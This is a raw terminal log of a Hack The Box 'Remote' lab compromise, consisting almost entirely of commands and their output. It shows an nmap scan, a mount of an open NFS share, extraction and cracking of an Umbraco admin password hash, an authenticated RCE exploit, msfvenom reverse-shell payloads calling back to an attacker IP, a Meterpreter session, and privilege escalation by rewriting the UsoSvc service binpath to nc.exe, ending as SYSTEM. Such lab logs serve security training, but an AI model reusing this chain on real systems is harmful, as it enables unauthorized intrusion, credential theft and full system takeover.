hack@kali:~/HackTheBox/Remote$ nmap -sC -sV 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-27 20:19 CEST
Nmap scan report for 10.10.10.180
Host is up (0.15s latency).
Not shown: 993 closed ports                                                                        
PORT     STATE SERVICE       VERSION                                                               
21/tcp   open  ftp           Microsoft ftpd                                                        
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)                                             
| ftp-syst:                                                                                        
|_  SYST: Windows_NT                                                                               
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                               
|_http-title: Home - Acme Widgets                                                                  
111/tcp  open  rpcbind       2-4 (RPC #100000)                                                     
| rpcinfo:                                                                                         
|   program version    port/proto  service                                                         
|   100000  2,3,4        111/tcp   rpcbind                                                         
|   100000  2,3,4        111/tcp6  rpcbind                                                         
|   100000  2,3,4        111/udp   rpcbind                                                         
|   100000  2,3,4        111/udp6  rpcbind                                                         
|   100003  2,3         2049/udp   nfs                                                             
|   100003  2,3         2049/udp6  nfs                                                             
|   100003  2,3,4       2049/tcp   nfs                                                             
|   100003  2,3,4       2049/tcp6  nfs                                                             
|   100005  1,2,3       2049/tcp   mountd                                                          
|   100005  1,2,3       2049/tcp6  mountd                                                          
|   100005  1,2,3       2049/udp   mountd                                                          
|   100005  1,2,3       2049/udp6  mountd                                                          
|   100021  1,2,3,4     2049/tcp   nlockmgr                                                        
|   100021  1,2,3,4     2049/tcp6  nlockmgr                                                        
|   100021  1,2,3,4     2049/udp   nlockmgr                                                        
|   100021  1,2,3,4     2049/udp6  nlockmgr                                                        
|   100024  1           2049/tcp   status                                                          
|   100024  1           2049/tcp6  status                                                          
|   100024  1           2049/udp   status                                                          
|_  100024  1           2049/udp6  status                                                          
135/tcp  open  msrpc         Microsoft Windows RPC                                                 
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                         
445/tcp  open  microsoft-ds?                                                                       
2049/tcp open  mountd        1-3 (RPC #100005)                                                     
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows                                           
                                                                                                   
Host script results:                                                                               
|_clock-skew: 2m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-27T18:24:13
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.76 seconds



Users:
Niels
niels
polish
Polish
admin

hack@kali:~/HackTheBox/Remote$ sudo showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
hack@kali:~/HackTheBox/Remote$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/

<smtp from="noreply@example.com">
<network host="127.0.0.1" userName="username" password="password" />


Umbraco.sdf
/media/1031/food_log.txt

admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa
smith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA=

admin@htb.local:b8be16afba8c314ad33d812f22a04991b90e2aaa
ssmith@htb.local:8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA=


https://hashes.com/en/decrypt/basic
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
admin@htb.local:baconandcheese

hack@kali:~/HackTheBox/Remote$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::cf7:5f0b:dd12:7efb
   Link-local IPv6 Address . . . . . : fe80::cf7:5f0b:dd12:7efb%13
   IPv4 Address. . . . . . . . . . . : 10.10.10.180
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7eaa%13
                                       fe80::250:56ff:feb9:8535%13
                                       10.10.10.2


hack@kali:~/HackTheBox/Remote$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.15.87" LPORT=1234 -f exe > shell.exe



msf5 exploit(multi/handler) > run


hack@kali:~/HackTheBox/Remote$ python exploit.py -u admin@htb.local -p baconandcheese -i "http://10.10.10.180" -c powershell.exe -a 'C:/inetpub/wwwroot/Media/1033/shell.exe'



[*] Started reverse TCP handler on 10.10.15.87:1234 
[*] Sending stage (180291 bytes) to 10.10.10.180
[*] Meterpreter session 2 opened (10.10.15.87:1234 -> 10.10.10.180:49684) at 2020-04-28 00:31:10 +0200

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool


meterpreter > ls
Listing: C:\Users\Public
========================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40555/r-xr-xr-x   0     dir   2020-02-19 21:03:50 +0100  AccountPictures
40555/r-xr-xr-x   0     dir   2018-09-15 09:19:00 +0200  Desktop
40555/r-xr-xr-x   0     dir   2018-09-15 09:19:00 +0200  Documents
40555/r-xr-xr-x   0     dir   2018-09-15 09:19:00 +0200  Downloads
40555/r-xr-xr-x   0     dir   2018-09-15 09:19:00 +0200  Libraries
40555/r-xr-xr-x   0     dir   2018-09-15 09:19:00 +0200  Music
40555/r-xr-xr-x   0     dir   2018-09-15 09:19:00 +0200  Pictures
40555/r-xr-xr-x   0     dir   2018-09-15 09:19:00 +0200  Videos
100666/rw-rw-rw-  174   fil   2018-09-15 09:16:48 +0200  desktop.ini
100444/r--r--r--  34    fil   2020-02-20 08:41:31 +0100  user.txt

meterpreter > download user.txt
[*] Downloading: user.txt -> user.txt
[*] Downloaded 34.00 B of 34.00 B (100.0%): user.txt -> user.txt
[*] download   : user.txt -> user.txt


hack@kali:~$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.15.87 lport=8888 -f exe --platform windows > reverse.exe



meterpreter > upload reversep.exe
[*] uploading  : reversep.exe -> reversep.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): reversep.exe -> reversep.exe
[*] uploaded   : reversep.exe -> reversep.exe
meterpreter > ls
Listing: C:\windows\temp
========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  95282  fil   2020-02-20 00:02:36 +0100  MpCmdRun.log
100777/rwxrwxrwx  36528  fil   2020-04-30 19:22:55 +0200  nc.exe
100666/rw-rw-rw-  784    fil   2020-04-30 19:22:09 +0200  rev.ps1
100777/rwxrwxrwx  49     fil   2020-04-30 22:28:52 +0200  reverse.bat
100777/rwxrwxrwx  73802  fil   2020-04-30 19:33:04 +0200  reverse.exe
100777/rwxrwxrwx  73802  fil   2020-04-30 22:36:51 +0200  reversep.exe
100666/rw-rw-rw-  102    fil   2020-02-19 21:04:24 +0100  silconfig.log
100666/rw-rw-rw-  0      fil   2020-04-30 19:16:51 +0200  skxqvqsb.err
100666/rw-rw-rw-  854    fil   2020-04-30 19:16:51 +0200  skxqvqsb.out
100777/rwxrwxrwx  2287   fil   2020-04-30 19:26:12 +0200  veil443.bat
100666/rw-rw-rw-  30833  fil   2020-02-19 21:04:49 +0100  vmware-vmsvc.log
100666/rw-rw-rw-  960    fil   2020-02-19 21:05:33 +0100  vmware-vmvss.log

meterpreter > shell
Process 9072 created.
Channel 6 created.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\temp>sc config usosvc binpath="C:\Windows\temp\nc.exe 10.10.15.87 888 -e C:\windows\                     

C:\windows\temp>

C:\windows\temp>sc config usosvc binpath="c:\windows\temp\reversep.exe"
sc config usosvc binpath="c:\windows\temp\reversep.exe"
[SC] ChangeServiceConfig SUCCESS

C:\windows\temp>sc start usosvc
sc start usosvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.


C:\windows\temp>



C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Users\Administrator\Desktop

02/20/2020  03:41 AM    <DIR>          .
02/20/2020  03:41 AM    <DIR>          ..
04/30/2020  01:16 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  19,292,856,320 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
7a0345ada829404ac308d62565e31303

C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>


